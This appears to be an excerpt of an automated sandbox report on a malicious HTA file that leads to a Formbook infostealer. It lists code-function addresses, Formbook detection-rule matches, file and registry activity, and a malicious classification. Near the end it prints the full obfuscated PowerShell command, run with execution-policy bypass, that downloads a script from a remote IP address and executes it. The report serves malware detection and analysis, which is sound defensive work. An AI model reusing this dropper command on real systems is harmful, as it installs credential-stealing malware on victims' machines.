                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111F7B011_2_0111F7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011116CC11_2_011116CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F591011_2_010F5910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106995011_2_01069950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107B95011_2_0107B950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CD80011_2_010CD800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010638E011_2_010638E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111FB7611_2_0111FB76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107FB8011_2_0107FB80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0109DBF911_2_0109DBF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D5BF011_2_010D5BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01117A4611_2_01117A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111FA4911_2_0111FA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D3A6C11_2_010D3A6C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FDAAC11_2_010FDAAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A5AA011_2_010A5AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01101AA311_2_01101AA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110DAC611_2_0110DAC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01063D4011_2_01063D40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01111D5A11_2_01111D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01117D7311_2_01117D73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107FDC011_2_0107FDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D9C3211_2_010D9C32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111FCF211_2_0111FCF2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111FF0911_2_0111FF09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01061F9211_2_01061F92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111FFB111_2_0111FFB1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01069EB011_2_01069EB0
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C1FC7012_2_06C1FC70
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C4050012_2_06C40500
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C2828012_2_06C28280
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C26A4012_2_06C26A40
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C21BF012_2_06C21BF0
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C2A0A012_2_06C2A0A0
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C219C712_2_06C219C7
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 12_2_06C219D012_2_06C219D0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048BE4F614_2_048BE4F6
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CF43F14_2_048CF43F
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048C244614_2_048C2446
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0480146014_2_04801460
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048D059114_2_048D0591
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048AD5B014_2_048AD5B0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0481053514_2_04810535
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048C757114_2_048C7571
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048C16CC14_2_048C16CC
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0482C6E014_2_0482C6E0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CF7B014_2_048CF7B0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0480C7C014_2_0480C7C0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0483475014_2_04834750
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0481077014_2_04810770
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048170C014_2_048170C0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048BF0CC14_2_048BF0CC
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048C70E914_2_048C70E9
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CF0E014_2_048CF0E0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_047FF17214_2_047FF172
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048D01AA14_2_048D01AA
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0481B1B014_2_0481B1B0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048C81CC14_2_048C81CC
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0480010014_2_04800100
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048AA11814_2_048AA118
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0489815814_2_04898158
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048DB16B14_2_048DB16B
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0484516C14_2_0484516C
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048152A014_2_048152A0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0482B2C014_2_0482B2C0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048B12ED14_2_048B12ED
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048B027414_2_048B0274
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0485739A14_2_0485739A
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_047FD34C14_2_047FD34C
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048D03E614_2_048D03E6
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0481E3F014_2_0481E3F0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048C132D14_2_048C132D
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CA35214_2_048CA352
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048B0CB514_2_048B0CB5
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04800CF214_2_04800CF2
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CFCF214_2_048CFCF2
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04810C0014_2_04810C00
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04889C3214_2_04889C32
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04828DBF14_2_04828DBF
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0482FDC014_2_0482FDC0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0480ADE014_2_0480ADE0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0481AD0014_2_0481AD00
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04813D4014_2_04813D40
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048C1D5A14_2_048C1D5A
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048C7D7314_2_048C7D73
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04822E9014_2_04822E90
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CCE9314_2_048CCE93
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04819EB014_2_04819EB0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CEEDB14_2_048CEEDB
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CEE2614_2_048CEE26
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04810E5914_2_04810E59
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04811F9214_2_04811F92
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CFFB114_2_048CFFB1
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04802FC814_2_04802FC8
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0481CFE014_2_0481CFE0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CFF0914_2_048CFF09
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04852F2814_2_04852F28
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04830F3014_2_04830F30
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04884F4014_2_04884F40
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048138E014_2_048138E0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0483E8F014_2_0483E8F0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0487D80014_2_0487D800
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0481284014_2_04812840
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0481A84014_2_0481A840
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_047F68B814_2_047F68B8
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048129A014_2_048129A0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048DA9A614_2_048DA9A6
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0481995014_2_04819950
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0482B95014_2_0482B950
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0482696214_2_04826962
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0480EA8014_2_0480EA80
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04855AA014_2_04855AA0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048ADAAC14_2_048ADAAC
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048BDAC614_2_048BDAC6
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CFA4914_2_048CFA49
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048C7A4614_2_048C7A46
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04883A6C14_2_04883A6C
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0482FB8014_2_0482FB80
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048C6BD714_2_048C6BD7
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04885BF014_2_04885BF0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0484DBF914_2_0484DBF9
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CAB4014_2_048CAB40
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048CFB7614_2_048CFB76
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0293178014_2_02931780
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0294B24014_2_0294B240
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0292C71014_2_0292C710
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0292C70714_2_0292C707
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0292A9B014_2_0292A9B0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0292C93014_2_0292C930
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_02932FC014_2_02932FC0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_02934DE014_2_02934DE0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_046CE49314_2_046CE493
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_046CE37514_2_046CE375
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_046CE82C14_2_046CE82C
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_046CD89814_2_046CD898
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_046CCB3814_2_046CCB38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 010DF290 appears 105 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 010CEA12 appears 86 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01095130 appears 58 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0104B970 appears 280 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 010A7E54 appears 102 times
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 0488F290 appears 105 times
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 047FB970 appears 268 times
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 04857E54 appears 96 times
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 04845130 appears 36 times
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 0487EA12 appears 86 times
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 5988, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winHTA@21/17@12/8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\verygreattrafficwithniceworkingskilltobegood[1].tiffJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5rymsdy.m5d.ps1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS"
                  Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: ieUnatt.exe, 0000000E.00000003.2712741290.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2715255764.0000000002A46000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4512419516.0000000002A46000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2715255764.0000000002A1F000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2712848578.0000000002A1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaReversingLabs: Detection: 18%
                  Source: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaVirustotal: Detection: 24%
                  Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
